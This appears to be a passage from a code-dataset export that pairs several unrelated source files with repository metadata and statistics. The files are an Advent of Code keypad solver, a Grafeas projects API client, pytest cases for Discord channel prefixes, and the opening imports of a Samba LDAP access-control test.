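# configuration = Configuration(username="FDS-USERNAME", password="API-KEY")  # names assumed
# with ApiClient(configuration) as api_client:
#     api = FactorLibraryApi(api_client)                 # class name assumed
#     request = LibraryRequest(...)                      # set factors / factor_groups here
#     response = api.get_factor_library_list(request)    # sync -> LibraryResponse
#     future = api.get_factor_library_list_async(request)
#     response = future.get()                            # ApplyResult -> LibraryResponse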
| 119.427788
| 10,065
| 0.735102
| 8,515
| 65,327
| 5.587551
| 0.080329
| 0.017571
| 0.020177
| 0.017655
| 0.951869
| 0.94838
| 0.944996
| 0.942978
| 0.940666
| 0.940666
| 0
| 0.001996
| 0.217659
| 65,327
| 546
| 10,066
| 119.64652
| 0.928935
| 0.840786
| 0
| 0.575342
| 0
| 0
| 0.170886
| 0.047834
| 0
| 0
| 0
| 0
| 0
| 1
| 0.045662
| false
| 0
| 0.041096
| 0
| 0.127854
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
c5643a949b693e990a55f2cc7cc2e34d465b8371
| 3,356
|
py
|
Python
|
2016/day02.py
|
mbcollins2/aoc
|
b94380fd5e92b4fe9f4af654e7762174c1c6ac91
|
[
"MIT"
] | null | null | null |
2016/day02.py
|
mbcollins2/aoc
|
b94380fd5e92b4fe9f4af654e7762174c1c6ac91
|
[
"MIT"
] | 3
|
2021-12-15T19:12:38.000Z
|
2021-12-15T19:14:42.000Z
|
2016/day02.py
|
mbcollins2/aoc
|
b94380fd5e92b4fe9f4af654e7762174c1c6ac91
|
[
"MIT"
] | null | null | null |
class solve_day(object):
with open('inputs/day02.txt', 'r') as f:
data = f.readlines()
def part1(self):
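# Part 1: follow each line of U/D/L/R moves across a 3x3 keypad; the
# conditional updates below ignore any move that would leave the grid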
grid = [[1,2,3],
[4,5,6],
[7,8,9]]
code = []
## locations
# 1 - grid[0][0]
# 2 - grid[0][1]
# 3 - grid[0][2]
# 4 - grid[1][0]
# 5 - grid[1][1]
# 6 - grid[1][2]
# 7 - grid[2][0]
# 8 - grid[2][1]
# 9 - grid[2][2]
position = [0,0]
for i,d in enumerate(self.data):
d = d.strip()
if i == 0:
# set starting position: key '5' (grid[1][1]); later lines continue from where the previous line ended
position = [1,1]
for x in d:
if x == 'U':
position[0] += -1 if position[0]-1 >= 0 and position[0]-1 <= 2 else 0
if x == 'D':
position[0] += 1 if position[0]+1 >= 0 and position[0]+1 <= 2 else 0
if x == 'R':
position[1] += 1 if position[1]+1 >= 0 and position[1]+1 <= 2 else 0
if x == 'L':
position[1] += -1 if position[1]-1 >= 0 and position[1]-1 <= 2 else 0
code.append(grid[position[0]][position[1]])
return ''.join([str(x) for x in code])
def part2(self):
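# Part 2: same walk on a diamond-shaped keypad; '' cells pad the 5x5 grid,
# and the per-row/per-column range checks keep every move on the diamond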
grid = [['','',1,'',''],
['',2,3,4,''],
[5,6,7,8,9],
['','A','B','C',''],
['','','D','','']]
code = []
position = [0,0]
for i,d in enumerate(self.data):
d = d.strip()
if i == 0:
# set starting position: key '5' (grid[2][0] on the diamond keypad); later lines continue from the previous position
position = [2,0]
for x in d:
if x == 'U':
if position[1] in [0, 4]:
pass
if position[1] in [1, 3]:
position[0] += -1 if position[0]-1 in [1,2,3] else 0
if position[1] in [2]:
position[0] += -1 if position[0]-1 in [0,1,2,3,4] else 0
if x == 'D':
if position[1] in [0, 4]:
pass
if position[1] in [1, 3]:
position[0] += 1 if position[0]+1 in [1,2,3] else 0
if position[1] in [2]:
position[0] += 1 if position[0]+1 in [0,1,2,3,4] else 0
if x == 'R':
if position[0] in [0, 4]:
pass
if position[0] in [1, 3]:
position[1] += 1 if position[1]+1 in [1,2,3] else 0
if position[0] in [2]:
position[1] += 1 if position[1]+1 in [0,1,2,3,4] else 0
if x == 'L':
if position[0] in [0, 4]:
pass
if position[0] in [1, 3]:
position[1] += -1 if position[1]-1 in [1,2,3] else 0
if position[0] in [2]:
position[1] += -1 if position[1]-1 in [0,1,2,3,4] else 0
code.append(grid[position[0]][position[1]])
return ''.join([str(x) for x in code])
if __name__ == '__main__':
s = solve_day()
print(f'Part 1: {s.part1()}')
print(f'Part 2: {s.part2()}')
| 30.509091
| 89
| 0.353397
| 452
| 3,356
| 2.60177
| 0.130531
| 0.183673
| 0.127551
| 0.020408
| 0.816327
| 0.811224
| 0.808673
| 0.789966
| 0.789966
| 0.789966
| 0
| 0.119308
| 0.483015
| 3,356
| 110
| 90
| 30.509091
| 0.558501
| 0.056019
| 0
| 0.56338
| 0
| 0
| 0.023779
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.028169
| false
| 0.056338
| 0
| 0
| 0.070423
| 0.028169
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
c566d84333dbe883bc19714a02a8319e6514f2b9
| 191
|
py
|
Python
|
old_tests/helios/core/utils/test_version.py
|
hyperevo/py-helios-node
|
ff417fe3fe90f85c9f95b3d8a5f0dd4c80532ee8
|
[
"MIT"
] | null | null | null |
old_tests/helios/core/utils/test_version.py
|
hyperevo/py-helios-node
|
ff417fe3fe90f85c9f95b3d8a5f0dd4c80532ee8
|
[
"MIT"
] | null | null | null |
old_tests/helios/core/utils/test_version.py
|
hyperevo/py-helios-node
|
ff417fe3fe90f85c9f95b3d8a5f0dd4c80532ee8
|
[
"MIT"
] | null | null | null |
from helios.utils.version import construct_trinity_client_identifier
def test_construct_trinity_client_identifier():
assert construct_trinity_client_identifier().startswith('Trinity/')
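# Note (illustrative): only the "Trinity/" prefix is asserted above; the rest
# of the identifier (version/platform details) is assumed to vary between
# environments and is deliberately not checked by this test.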
| 31.833333
| 71
| 0.858639
| 22
| 191
| 7
| 0.590909
| 0.311688
| 0.428571
| 0.623377
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.073298
| 191
| 5
| 72
| 38.2
| 0.870057
| 0
| 0
| 0
| 0
| 0
| 0.041885
| 0
| 0
| 0
| 0
| 0
| 0.333333
| 1
| 0.333333
| true
| 0
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 9
|
3decb52f407efb476fee68e4baa421bade20aa78
| 15,527
|
py
|
Python
|
grafeas/api/grafeas_projects_api.py
|
nyc/client-python
|
e73eab8953abf239305080673f7c96a54b776f72
|
[
"Apache-2.0"
] | null | null | null |
grafeas/api/grafeas_projects_api.py
|
nyc/client-python
|
e73eab8953abf239305080673f7c96a54b776f72
|
[
"Apache-2.0"
] | null | null | null |
grafeas/api/grafeas_projects_api.py
|
nyc/client-python
|
e73eab8953abf239305080673f7c96a54b776f72
|
[
"Apache-2.0"
] | null | null | null |
# coding: utf-8
"""
Grafeas API
An API to insert and retrieve annotations on cloud artifacts. # noqa: E501
OpenAPI spec version: v1alpha1
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from grafeas.api_client import ApiClient
class GrafeasProjectsApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def create_project(self, body, **kwargs): # noqa: E501
"""Creates a new `Project`. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.create_project(body, async=True)
>>> result = thread.get()
:param async bool
:param ApiProject body: (required)
:return: ProtobufEmpty
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.create_project_with_http_info(body, **kwargs) # noqa: E501
else:
(data) = self.create_project_with_http_info(body, **kwargs) # noqa: E501
return data
def create_project_with_http_info(self, body, **kwargs): # noqa: E501
"""Creates a new `Project`. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.create_project_with_http_info(body, async=True)
>>> result = thread.get()
:param async bool
:param ApiProject body: (required)
:return: ProtobufEmpty
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_project" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'body' is set
if ('body' not in params or
params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `create_project`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/v1alpha1/projects', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ProtobufEmpty', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_project(self, name, **kwargs): # noqa: E501
"""Deletes the given `Project` from the system. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.delete_project(name, async=True)
>>> result = thread.get()
:param async bool
:param str name: (required)
:return: ProtobufEmpty
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.delete_project_with_http_info(name, **kwargs) # noqa: E501
else:
(data) = self.delete_project_with_http_info(name, **kwargs) # noqa: E501
return data
def delete_project_with_http_info(self, name, **kwargs): # noqa: E501
"""Deletes the given `Project` from the system. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.delete_project_with_http_info(name, async=True)
>>> result = thread.get()
:param async bool
:param str name: (required)
:return: ProtobufEmpty
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['name'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_project" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'name' is set
if ('name' not in params or
params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `delete_project`") # noqa: E501
collection_formats = {}
path_params = {}
if 'name' in params:
path_params['name'] = params['name'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/v1alpha1/{name}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ProtobufEmpty', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_project(self, name, **kwargs): # noqa: E501
"""Returns the requested `Project`. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_project(name, async=True)
>>> result = thread.get()
:param async bool
:param str name: (required)
:return: ApiProject
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.get_project_with_http_info(name, **kwargs) # noqa: E501
else:
(data) = self.get_project_with_http_info(name, **kwargs) # noqa: E501
return data
def get_project_with_http_info(self, name, **kwargs): # noqa: E501
"""Returns the requested `Project`. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_project_with_http_info(name, async=True)
>>> result = thread.get()
:param async bool
:param str name: (required)
:return: ApiProject
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['name'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_project" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'name' is set
if ('name' not in params or
params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `get_project`") # noqa: E501
collection_formats = {}
path_params = {}
if 'name' in params:
path_params['name'] = params['name'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/v1alpha1/{name}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ApiProject', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def list_projects(self, **kwargs): # noqa: E501
"""Lists `Projects` # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.list_projects(async=True)
>>> result = thread.get()
:param async bool
:param str filter: The filter expression.
:param int page_size: Number of projects to return in the list.
:param str page_token: Token to provide to skip to a particular spot in the list.
:return: ApiListProjectsResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.list_projects_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.list_projects_with_http_info(**kwargs) # noqa: E501
return data
def list_projects_with_http_info(self, **kwargs): # noqa: E501
"""Lists `Projects` # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.list_projects_with_http_info(async=True)
>>> result = thread.get()
:param async bool
:param str filter: The filter expression.
:param int page_size: Number of projects to return in the list.
:param str page_token: Token to provide to skip to a particular spot in the list.
:return: ApiListProjectsResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['filter', 'page_size', 'page_token'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method list_projects" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'filter' in params:
query_params.append(('filter', params['filter'])) # noqa: E501
if 'page_size' in params:
query_params.append(('page_size', params['page_size'])) # noqa: E501
if 'page_token' in params:
query_params.append(('page_token', params['page_token'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/v1alpha1/projects', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ApiListProjectsResponse', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
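# --- Usage sketch (illustrative, not part of the generated module) --------
# Minimal example of driving this client with the default ApiClient; the
# response/field names on the last two lines are assumptions about
# ApiListProjectsResponse, not verified here.
#
# from grafeas.api_client import ApiClient
# from grafeas.api.grafeas_projects_api import GrafeasProjectsApi
#
# api = GrafeasProjectsApi(ApiClient())
# resp = api.list_projects(page_size=10)
# for project in resp.projects:          # field name assumed
#     print project.name                 # py2 print, matching this module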
| 36.362998
| 113
| 0.59477
| 1,745
| 15,527
| 5.074499
| 0.098567
| 0.051496
| 0.025296
| 0.032524
| 0.913043
| 0.900169
| 0.881649
| 0.864935
| 0.859514
| 0.846189
| 0
| 0.020408
| 0.308881
| 15,527
| 426
| 114
| 36.448357
| 0.804771
| 0.065177
| 0
| 0.761062
| 1
| 0
| 0.163663
| 0.02956
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.017699
| null | null | 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
3dfe7c3a5b8234ba6f6a7fdbe0d3ff973159e5c5
| 6,766
|
py
|
Python
|
tests/test_prefix.py
|
kevslinger/DiscordCipherRace
|
c5a83d2fbc51fe29f33c1fe04f83c0b31b9def3c
|
[
"MIT"
] | null | null | null |
tests/test_prefix.py
|
kevslinger/DiscordCipherRace
|
c5a83d2fbc51fe29f33c1fe04f83c0b31b9def3c
|
[
"MIT"
] | null | null | null |
tests/test_prefix.py
|
kevslinger/DiscordCipherRace
|
c5a83d2fbc51fe29f33c1fe04f83c0b31b9def3c
|
[
"MIT"
] | null | null | null |
import pytest
from modules.solved.prefix import Prefix
from modules.solved import solved_constants
@pytest.mark.parametrize("channel,prefix,has_prefix",
[("help", solved_constants.SOLVED_PREFIX, False),
("help", solved_constants.BACKSOLVED_PREFIX, False),
("help", solved_constants.SOLVEDISH_PREFIX, False),
(f"{solved_constants.SOLVED_PREFIX}-help", solved_constants.SOLVED_PREFIX, True),
(f"{solved_constants.SOLVED_PREFIX}-help", solved_constants.BACKSOLVED_PREFIX, False),
(f"{solved_constants.SOLVED_PREFIX}-help", solved_constants.SOLVEDISH_PREFIX, False),
(f"{solved_constants.SOLVED_PREFIX}-{solved_constants.BACKSOLVED_PREFIX}-puzzle-2a", solved_constants.SOLVED_PREFIX, True),
(f"{solved_constants.SOLVED_PREFIX}-{solved_constants.BACKSOLVED_PREFIX}-puzzle-2a", solved_constants.BACKSOLVED_PREFIX, False),
(f"{solved_constants.SOLVED_PREFIX}-{solved_constants.SOLVEDISH_PREFIX}-puzzle-2a", solved_constants.SOLVEDISH_PREFIX, False),
(f"{solved_constants.SOLVEDISH_PREFIX}-{solved_constants.SOLVED_PREFIX}-puzzle", solved_constants.SOLVED_PREFIX, False),
(f"{solved_constants.SOLVEDISH_PREFIX}-{solved_constants.SOLVED_PREFIX}-puzzle", solved_constants.BACKSOLVED_PREFIX, False),
(f"{solved_constants.SOLVEDISH_PREFIX}-{solved_constants.SOLVED_PREFIX}-puzzle", solved_constants.SOLVEDISH_PREFIX, True),
(f"{solved_constants.BACKSOLVED_PREFIX}-{solved_constants.SOLVEDISH_PREFIX}-hunt", solved_constants.SOLVED_PREFIX, False),
(f"{solved_constants.BACKSOLVED_PREFIX}-{solved_constants.SOLVEDISH_PREFIX}-hunt", solved_constants.BACKSOLVED_PREFIX, True),
(f"{solved_constants.BACKSOLVED_PREFIX}-{solved_constants.SOLVEDISH_PREFIX}-hunt", solved_constants.SOLVEDISH_PREFIX, False)])
def test_has_prefix(channel, prefix, has_prefix):
prefix = Prefix(channel, prefix)
assert has_prefix == prefix.has_prefix()
@pytest.mark.parametrize("channel,prefix,new_channel",
[("help", solved_constants.SOLVED_PREFIX, f"{solved_constants.SOLVED_PREFIX}help"),
("puzzle1", solved_constants.SOLVED_PREFIX, f"{solved_constants.SOLVED_PREFIX}puzzle1"),
("puzzle1", solved_constants.BACKSOLVED_PREFIX, f"{solved_constants.BACKSOLVED_PREFIX}puzzle1"),
("puzzle1", solved_constants.SOLVEDISH_PREFIX, f"{solved_constants.SOLVEDISH_PREFIX}puzzle1"),
(f"{solved_constants.SOLVED_PREFIX}puzzle2", solved_constants.SOLVED_PREFIX, f"{solved_constants.SOLVED_PREFIX}puzzle2"),
(f"{solved_constants.SOLVED_PREFIX}puzzle2", solved_constants.BACKSOLVED_PREFIX, f"{solved_constants.BACKSOLVED_PREFIX}{solved_constants.SOLVED_PREFIX}puzzle2"),
(f"{solved_constants.SOLVED_PREFIX}puzzle2", solved_constants.SOLVEDISH_PREFIX, f"{solved_constants.SOLVEDISH_PREFIX}{solved_constants.SOLVED_PREFIX}puzzle2"),
(f"{solved_constants.SOLVEDISH_PREFIX}puzzle3", solved_constants.SOLVED_PREFIX, f"{solved_constants.SOLVED_PREFIX}{solved_constants.SOLVEDISH_PREFIX}puzzle3"),
(f"{solved_constants.SOLVEDISH_PREFIX}puzzle3", solved_constants.BACKSOLVED_PREFIX, f"{solved_constants.BACKSOLVED_PREFIX}{solved_constants.SOLVEDISH_PREFIX}puzzle3"),
(f"{solved_constants.SOLVEDISH_PREFIX}puzzle3", solved_constants.SOLVEDISH_PREFIX, f"{solved_constants.SOLVEDISH_PREFIX}puzzle3"),
(f"{solved_constants.BACKSOLVED_PREFIX}puzzle4", solved_constants.SOLVED_PREFIX, f"{solved_constants.SOLVED_PREFIX}{solved_constants.BACKSOLVED_PREFIX}puzzle4"),
(f"{solved_constants.BACKSOLVED_PREFIX}puzzle4", solved_constants.BACKSOLVED_PREFIX, f"{solved_constants.BACKSOLVED_PREFIX}puzzle4"),
(f"{solved_constants.BACKSOLVED_PREFIX}puzzle4", solved_constants.SOLVEDISH_PREFIX, f"{solved_constants.SOLVEDISH_PREFIX}{solved_constants.BACKSOLVED_PREFIX}puzzle4")])
def test_add_prefix(channel, prefix, new_channel):
prefix = Prefix(channel, prefix)
if not prefix.has_prefix():
assert new_channel == prefix.add_prefix()
@pytest.mark.parametrize("channel,prefix,new_channel",
[("help", solved_constants.SOLVED_PREFIX, f"help"),
("puzzle1", solved_constants.SOLVED_PREFIX, f"puzzle1"),
("puzzle1", solved_constants.BACKSOLVED_PREFIX, f"puzzle1"),
("puzzle1", solved_constants.SOLVEDISH_PREFIX, f"puzzle1"),
(f"{solved_constants.SOLVED_PREFIX}{solved_constants.SOLVEDISH_PREFIX}puzzle2", solved_constants.SOLVED_PREFIX, f"{solved_constants.SOLVEDISH_PREFIX}puzzle2"),
(f"{solved_constants.SOLVED_PREFIX}{solved_constants.SOLVEDISH_PREFIX}puzzle2", solved_constants.BACKSOLVED_PREFIX, f"{solved_constants.SOLVED_PREFIX}{solved_constants.SOLVEDISH_PREFIX}puzzle2"),
(f"{solved_constants.SOLVED_PREFIX}{solved_constants.SOLVEDISH_PREFIX}puzzle2", solved_constants.SOLVEDISH_PREFIX, f"{solved_constants.SOLVED_PREFIX}{solved_constants.SOLVEDISH_PREFIX}puzzle2"),
(f"{solved_constants.SOLVEDISH_PREFIX}{solved_constants.SOLVED_PREFIX}puzzle3", solved_constants.SOLVED_PREFIX, f"{solved_constants.SOLVEDISH_PREFIX}{solved_constants.SOLVED_PREFIX}puzzle3"),
(f"{solved_constants.SOLVEDISH_PREFIX}{solved_constants.SOLVED_PREFIX}puzzle3", solved_constants.BACKSOLVED_PREFIX, f"{solved_constants.SOLVEDISH_PREFIX}{solved_constants.SOLVED_PREFIX}puzzle3"),
(f"{solved_constants.SOLVEDISH_PREFIX}{solved_constants.SOLVED_PREFIX}puzzle3", solved_constants.SOLVEDISH_PREFIX, f"{solved_constants.SOLVED_PREFIX}puzzle3"),
(f"{solved_constants.BACKSOLVED_PREFIX}puzzle4", solved_constants.SOLVED_PREFIX, f"{solved_constants.BACKSOLVED_PREFIX}puzzle4"),
(f"{solved_constants.BACKSOLVED_PREFIX}puzzle4", solved_constants.BACKSOLVED_PREFIX, f"puzzle4"),
(f"{solved_constants.BACKSOLVED_PREFIX}puzzle4", solved_constants.SOLVEDISH_PREFIX, f"{solved_constants.BACKSOLVED_PREFIX}puzzle4")])
def test_remove_prefix(channel, prefix, new_channel):
prefix = Prefix(channel, prefix)
if prefix.has_prefix():
assert new_channel == prefix.remove_prefix()
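# --- Usage sketch (illustrative) -------------------------------------------
# Prefix wraps a channel name plus a single prefix and exposes the three
# methods exercised above:
#
# p = Prefix("puzzle1", solved_constants.SOLVED_PREFIX)
# p.has_prefix()      # False for an unprefixed channel
# p.add_prefix()      # returns the channel name with the prefix prepended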
| 102.515152
| 221
| 0.703665
| 707
| 6,766
| 6.373409
| 0.045262
| 0.39281
| 0.181092
| 0.26964
| 0.950954
| 0.936085
| 0.91589
| 0.848646
| 0.828229
| 0.731025
| 0
| 0.009308
| 0.190216
| 6,766
| 65
| 222
| 104.092308
| 0.813105
| 0
| 0
| 0.086207
| 0
| 0
| 0.461129
| 0.447236
| 0
| 0
| 0
| 0
| 0.051724
| 1
| 0.051724
| false
| 0
| 0.051724
| 0
| 0.103448
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 11
|
9ae04b5105473e340a512a3a276b841e90a7c617
| 255
|
py
|
Python
|
source/ml_tools.py
|
jonysalgado/machine_learning_tools
|
aedd2aa8d9b3cdba8a630ad141690d69c49f3461
|
[
"MIT"
] | null | null | null |
source/ml_tools.py
|
jonysalgado/machine_learning_tools
|
aedd2aa8d9b3cdba8a630ad141690d69c49f3461
|
[
"MIT"
] | null | null | null |
source/ml_tools.py
|
jonysalgado/machine_learning_tools
|
aedd2aa8d9b3cdba8a630ad141690d69c49f3461
|
[
"MIT"
] | null | null | null |
#-------------------------------------------------------------------------------
# imports
#-------------------------------------------------------------------------------
# Main class: ml_tools
class ml_tools:
def __init__(self):
pass
| 21.25
| 80
| 0.235294
| 12
| 255
| 4.5
| 0.75
| 0.259259
| 0.444444
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.113725
| 255
| 12
| 81
| 21.25
| 0.238938
| 0.745098
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0.333333
| 0
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
| 0
|
0
| 7
|
b131951047b23a4a0e0a098a042444f71cf57a6a
| 90,718
|
py
|
Python
|
release/src-rt-6.x.4708/router/samba3/source4/dsdb/tests/python/acl.py
|
zaion520/ATtomato
|
4d48bb79f8d147f89a568cf18da9e0edc41f93fb
|
[
"FSFAP"
] | 2
|
2019-01-13T09:16:31.000Z
|
2019-02-15T03:30:28.000Z
|
release/src-rt-6.x.4708/router/samba3/source4/dsdb/tests/python/acl.py
|
zaion520/ATtomato
|
4d48bb79f8d147f89a568cf18da9e0edc41f93fb
|
[
"FSFAP"
] | null | null | null |
release/src-rt-6.x.4708/router/samba3/source4/dsdb/tests/python/acl.py
|
zaion520/ATtomato
|
4d48bb79f8d147f89a568cf18da9e0edc41f93fb
|
[
"FSFAP"
] | 2
|
2020-03-08T01:58:25.000Z
|
2020-12-20T10:34:54.000Z
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Unit tests for LDAP access checks
import optparse
import sys
import base64
import re
sys.path.insert(0, "bin/python")
import samba
samba.ensure_external_module("testtools", "testtools")
samba.ensure_external_module("subunit", "subunit/python")
import samba.getopt as options
from samba.join import dc_join
from ldb import (
SCOPE_BASE, SCOPE_SUBTREE, LdbError, ERR_NO_SUCH_OBJECT,
ERR_UNWILLING_TO_PERFORM, ERR_INSUFFICIENT_ACCESS_RIGHTS)
from ldb import ERR_CONSTRAINT_VIOLATION
from ldb import ERR_OPERATIONS_ERROR
from ldb import Message, MessageElement, Dn
from ldb import FLAG_MOD_REPLACE, FLAG_MOD_ADD
from samba.dcerpc import security, drsuapi, misc
from samba.auth import system_session
from samba import gensec, sd_utils
from samba.samdb import SamDB
from samba.credentials import Credentials
import samba.tests
from samba.tests import delete_force
from subunit.run import SubunitTestRunner
import unittest
parser = optparse.OptionParser("acl.py [options] <host>")
sambaopts = options.SambaOptions(parser)
parser.add_option_group(sambaopts)
parser.add_option_group(options.VersionOptions(parser))
# use command line creds if available
credopts = options.CredentialsOptions(parser)
parser.add_option_group(credopts)
opts, args = parser.parse_args()
if len(args) < 1:
